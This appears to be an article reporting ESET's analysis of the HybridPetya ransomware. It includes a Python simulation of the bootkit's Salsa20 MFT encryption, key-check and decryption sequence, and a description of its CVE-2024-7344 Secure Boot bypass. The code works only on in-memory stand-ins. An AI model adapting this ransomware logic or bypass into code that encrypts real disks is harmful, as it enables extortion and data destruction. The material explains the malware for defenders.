HybridPetya Breaches PC Secure Boot Again

New Ransomware HybridPetya Emerges

Researchers from ESET reported the discovery of a new ransomware family called HybridPetya. It combines techniques from the infamous Petya and NotPetya and, in one of its variants, can bypass UEFI Secure Boot. That variant exploits CVE-2024-7344, a vulnerability patched in January 2025 in a Microsoft-signed third-party UEFI application that loads an unsigned EFI image without any integrity check. ESET found no evidence of the samples being used in real attacks and assesses them as a proof of concept or an early test version.

Samples of the malware were first uploaded to VirusTotal in February 2025. Unlike the original Petya and NotPetya, which targeted legacy BIOS/MBR boot, HybridPetya drops its own EFI application onto the EFI System Partition and uses it to encrypt the Master File Table (MFT), the NTFS structure that holds the metadata for every file on the volume. While encrypting, it shows the user a fake CHKDSK disk-check message; in reality it is making the contents of the disk inaccessible.

The malware consists of two main parts: the installer and the bootkit. The bootkit reads its configuration from the EFI System Partition and tracks the encryption state with a flag that takes one of three values (not yet encrypted, encrypted, and key accepted, the value "2" described below). Encryption proceeds in a fixed order: the bootkit first encrypts the verify file with the Salsa20 stream cipher (a block of known content whose decryption later proves a key is correct), then creates a counter file on the EFI partition to record progress, and only then encrypts the MFT clusters of every NTFS partition it finds.

The ransom note demands $1,000 in Bitcoin, but between February and May 2025 the wallet address in the note received only about $183 in total; that balance has since been withdrawn and the address is now empty.

After paying, the victim receives a key. The bootkit checks it by decrypting the verify file: if the known content comes back intact, the flag is set to "2". On the next run the bootkit decrypts the encrypted clusters, restores the original Windows bootloader, and prompts the user to reboot into Windows.
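The following is an added example, written for this article and not code from ESET or from HybridPetya itself, that models the two paragraphs above: the verify-file/counter-file/flag sequence, the key check that gates the transition to flag "2", and the decryption run that follows. Salsa20/20 is implemented in pure Python (standard construction). The file layout under EFI/Microsoft/Boot, the single-byte flag stored in `config` next to the key and nonce, the 512-byte known plaintext of the verify file, the name of the bootloader backup, and the wiping of the key from disk once encryption finishes are all assumptions made for the model; the Secure Boot bypass itself is not modelled.

```python
import os
import struct

# ---------- Salsa20/20 keystream (standard construction, written for this example) ----------
MASK = 0xFFFFFFFF
SIGMA = struct.unpack("<4I", b"expand 32-byte k")

def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK

def _salsa20_block(key, nonce, counter):
    """One 64-byte keystream block: 32-byte key, 8-byte nonce, 64-bit block counter."""
    k, n = struct.unpack("<8I", key), struct.unpack("<2I", nonce)
    s = [SIGMA[0], k[0], k[1], k[2], k[3], SIGMA[1], n[0], n[1], counter & MASK,
         (counter >> 32) & MASK, SIGMA[2], k[4], k[5], k[6], k[7], SIGMA[3]]
    x = list(s)
    def qr(a, b, c, d):
        x[b] ^= _rotl((x[a] + x[d]) & MASK, 7)
        x[c] ^= _rotl((x[b] + x[a]) & MASK, 9)
        x[d] ^= _rotl((x[c] + x[b]) & MASK, 13)
        x[a] ^= _rotl((x[d] + x[c]) & MASK, 18)
    for _ in range(10):  # 10 double rounds = Salsa20/20
        qr(0, 4, 8, 12); qr(5, 9, 13, 1); qr(10, 14, 2, 6); qr(15, 3, 7, 11)   # column round
        qr(0, 1, 2, 3); qr(5, 6, 7, 4); qr(10, 11, 8, 9); qr(15, 12, 13, 14)   # row round
    return struct.pack("<16I", *((a + b) & MASK for a, b in zip(x, s)))

def salsa20_xor(key, nonce, data, block_offset=0):
    """Encrypt or decrypt (same operation) starting at keystream block `block_offset`."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = _salsa20_block(key, nonce, block_offset + i // 64)
        out += bytes(a ^ b for a, b in zip(data[i:i + 64], ks))
    return bytes(out)

# ---------- Bootkit state machine as the article describes it (file layout is an assumption) ----------
BOOT = "EFI/Microsoft/Boot/"
CONFIG, VERIFY, COUNTER = BOOT + "config", BOOT + "verify", BOOT + "counter"
BOOTMGFW, BOOTMGFW_ORIG = BOOT + "bootmgfw.efi", BOOT + "bootmgfw.efi.orig"  # backup name assumed
FLAG_NOT_ENCRYPTED, FLAG_ENCRYPTED, FLAG_KEY_ACCEPTED = 0, 1, 2
VERIFY_PLAINTEXT = bytes(range(256)) * 2          # assumed 512-byte known content of the verify file
CLUSTER = 4096                                     # NTFS default cluster size
BLOCKS_PER_CLUSTER, VERIFY_BLOCKS = CLUSTER // 64, len(VERIFY_PLAINTEXT) // 64

def _config(esp):
    c = esp[CONFIG]
    return c[0], c[1:33], c[33:41]   # flag byte, 32-byte key, 8-byte nonce (assumed layout)

def install(esp, key, nonce):
    """Installer: replace the bootloader with the bootkit, keep the original, drop config (flag 0) and verify."""
    esp[BOOTMGFW_ORIG] = esp[BOOTMGFW]
    esp[BOOTMGFW] = b"<bootkit image>"
    esp[CONFIG] = bytes([FLAG_NOT_ENCRYPTED]) + key + nonce
    esp[VERIFY] = VERIFY_PLAINTEXT

def bootkit_boot(esp, mft_clusters):
    """One boot of the bootkit; `mft_clusters` (a list of bytes) is rewritten in place."""
    flag, key, nonce = _config(esp)
    if flag == FLAG_NOT_ENCRYPTED:
        esp[VERIFY] = salsa20_xor(key, nonce, VERIFY_PLAINTEXT)          # step 1: verify file first
        done = struct.unpack("<I", esp.get(COUNTER, bytes(4)))[0]        # step 2: counter = progress so far
        for i in range(done, len(mft_clusters)):                         # step 3: the MFT clusters
            mft_clusters[i] = salsa20_xor(key, nonce, mft_clusters[i], VERIFY_BLOCKS + i * BLOCKS_PER_CLUSTER)
            esp[COUNTER] = struct.pack("<I", i + 1)
        esp[CONFIG] = bytes([FLAG_ENCRYPTED]) + bytes(32) + nonce         # key wiped from disk (assumed)
        return "fake CHKDSK screen"
    if flag == FLAG_ENCRYPTED:
        return "ransom note"
    for i in range(len(mft_clusters)):                                   # flag 2: decrypt, then hand back
        mft_clusters[i] = salsa20_xor(key, nonce, mft_clusters[i], VERIFY_BLOCKS + i * BLOCKS_PER_CLUSTER)
    esp[BOOTMGFW] = esp.pop(BOOTMGFW_ORIG)                               # restore the original bootloader
    return "restored, reboot"

def enter_key(esp, candidate):
    """Ransom-note key entry: accepted only if it decrypts `verify` back to the known content."""
    flag, _, nonce = _config(esp)
    if flag != FLAG_ENCRYPTED or salsa20_xor(candidate, nonce, esp[VERIFY]) != VERIFY_PLAINTEXT:
        return False
    esp[CONFIG] = bytes([FLAG_KEY_ACCEPTED]) + candidate + nonce
    return True

def demo():
    """Run infect -> encrypt -> wrong key -> right key -> decrypt on constructed in-memory data."""
    esp = {BOOTMGFW: b"<real bootmgfw.efi>"}          # constructed stand-in for the ESP
    mft = [os.urandom(CLUSTER) for _ in range(4)]      # constructed stand-in for the MFT clusters
    original = list(mft)
    key, nonce = os.urandom(32), os.urandom(8)
    install(esp, key, nonce)
    screen1 = bootkit_boot(esp, mft)
    encrypted = mft != original and esp[CONFIG][0] == FLAG_ENCRYPTED and esp[CONFIG][1:33] == bytes(32)
    wrong = enter_key(esp, os.urandom(32))
    right = enter_key(esp, key)
    screen2 = bootkit_boot(esp, mft)
    restored = mft == original and esp[BOOTMGFW] == b"<real bootmgfw.efi>"
    return {"screen1": screen1, "encrypted": encrypted, "wrong_key_accepted": wrong,
            "right_key_accepted": right, "screen2": screen2, "restored": restored}

if __name__ == "__main__":
    print(demo())
```

The point of the verify file is visible in `enter_key`: a stream cipher gives no error on a wrong key, so without a block of known plaintext the bootkit could not tell a valid key from garbage before it starts "decrypting" the MFT and destroying it for good. The counter file lets an interrupted encryption run resume from the last cluster instead of re-encrypting clusters twice, which with a stream cipher would silently decrypt them.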

One notable detail is how the installer hands control to the bootkit: after dropping its files it deliberately crashes Windows with a "blue screen" error, forcing a reboot so that the malicious EFI module runs at the next startup. In the Secure Boot-bypassing variant, the installer places the vulnerable Howyar Reloader application (reloader.efi, the subject of CVE-2024-7344) on the EFI System Partition in place of the Windows bootloader, together with the bootkit stored in the loader's custom encrypted format as cloak.dat. Because the Microsoft-signed reloader decrypts and executes cloak.dat without any signature or integrity check, Secure Boot never sees the bootkit. Systems that have applied Microsoft's January 2025 DBX revocation of the affected binaries will refuse to run the reloader, so the bypass depends on that update not yet being installed.
